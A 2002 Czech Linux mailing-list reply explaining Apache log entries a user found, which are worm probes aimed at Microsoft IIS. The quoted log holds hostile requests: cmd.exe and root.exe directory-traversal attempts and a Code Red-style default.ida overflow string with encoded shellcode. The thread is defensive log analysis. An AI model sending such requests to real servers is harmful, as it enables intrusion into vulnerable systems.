Apache logy -- hack -- bespecnost
Tomas Valousek
xvalous na pluto.pslib.cz
Úterý Únor 19 19:45:24 CET 2002
On Tue, 19 Feb 2002 adam_1 na centrum.cz wrote:
> Hello linux,
>
> Dobry den kdyz jsem si dnes prochazel logy z Apache tak jsem narazil
> na nektere veci ktere se mi docela nezdaji nesel by se tu nekdo zvas
> kdo by mi rekl kdo a o co se pokousel. Popripade jestli se necim
> takovym da zmocnit /bin/bash (nechci rici root protoze staci i jiny
> uzivatel a pres neho je otazka par hodin se dostat k root). V
> pripade ze se nejakym timto spusobem da dostat dovnitr jaka je
> obrana?
> Tohle jsem nasel v souboru /var/log/httpd/access_log
> ----------------------------------------------------------------------------------
> 212.32.196.115 - - [18/Feb/2002:19:48:11 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:12 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:19 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:30 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:36 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
> 213.10.1.40 - - [19/Feb/2002:11:56:40 +0100] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 322 "-" "-"
Toto je nekolik zpusobu jak se dostat na IIS (to je takovyto tamto od
tamtech na tamto). Linux to zcela urcite nemuze ohrozit ;-).
BTW: kdyz zadate cast toho pozadavku do guglu tak to najde podrobnejsi
informace o techto vecech
--
Tomas -VALY- Valousek
web design, internet projects, linux etc..
email: tomas na valousek.cz
www: http://www.pslib.cz/~xvalous (~=ALT+126)
Další informace o konferenci Linux